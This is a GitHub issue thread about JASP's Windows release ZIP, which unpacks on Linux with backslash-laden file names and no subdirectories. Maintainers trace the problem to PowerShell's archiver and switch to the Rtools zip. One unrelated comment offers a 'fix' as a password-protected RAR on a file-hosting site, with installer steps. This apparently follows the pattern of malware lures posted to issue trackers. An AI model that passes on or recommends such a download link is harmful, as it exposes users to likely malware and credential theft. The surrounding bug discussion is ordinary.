### ISSUE TITLE
[Bug]: Zip files expand with backslashes on Linux, no subdirectories

### ISSUE THREAD

**Issue by zirneklitis** [jasp-stats/jasp-issues#2886]
### JASP Version

0.19.0

### JASP Module

Unrelated

### What analysis are you seeing the problem on?

Instalation file format

### What OS are you seeing the problem on?

Linux

### Bug Description

The archivator, which is used for creating releases' ZIP files (e.g. JASP-0.19.0.0-Windows.zip), does not respect ZIP file specification. As the result Zip files expand with backslashes on Linux, no subdirectories. Files with fancy names are created like "translations\qtwebengine_locales\lv.pak".

### Expected Behaviour

The necessary subdirectories should be created while unpacking the file.

### Steps to Reproduce

1. Open/extract archive in Linux environment.
![Wrong_Zip](https://github.com/user-attachments/assets/56b55d06-bd85-448d-b7bb-4f0083e55d1c)

### Final Checklist

- [X] I have included a screenshot showcasing the issue, if possible.
- [ ] I have included a JASP file (zipped) or data file that causes the crash/bug, if applicable.
- [X] I have accurately described the bug, and steps to reproduce it.

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by shun2wang** [comment]
Hi, @Bongton 

I'm curious what your use case is, why would you want to open a Windows zip installation package on a Linux system?  on Windows the `\` is a valid path delimiter, but yes we didn't has a subdirectory for that zip file.

**Comment by shun2wang** [comment]
Yes I know that but it made on Windows by some windows tools, so it just valid on Windows but not following ZIP stand 4.4.17.1,  we using `powershell Compress-Archive` to compress a .zip file, see here:https://github.com/jasp-stats/jasp-desktop/blob/e5877e750eca076932dcf174be486a0d6523bdd7/Tools/windows/zip/ZIP.cmd.in#L15C1-L15C28 and which has not following the stand by Microsoft, see:https://github.com/PowerShell/Microsoft.PowerShell.Archive/issues/54

**Comment by shun2wang** [comment]
@boutinb @RensDofferhoff maybe we can set a 7zip installer on our buildbot and made ZIP files from it to following the standard. but I must admit this is not a priority as it is not the use case for the vast majority of people on Windows.

**Comment by tomtomme** [comment]
I also have a use case. Testing stuff via older releases on linux via wine. 
E.g. to see if some result differs from jasp to jasp version.
I used wine in the past using the msi installer on linux, but that one does not work for every release. To have the zip as a fallback would be cool since flatpak has nothing like this to go back in time.

**Comment by RensDofferhoff** [comment]
Interesting issue! I like your idea @shun2wang
I'm doing buildbot work anyway so I might just do 7zip instead.
weird that the MD tool doesn't follow the standard

**Comment by RensDofferhoff** [comment]
I implemented this on our new buildbot VM. It will build a development nightly this evening.
We now use the zip shipped with Rtools as suggested by @shun2wang .
This should resolve this issue.
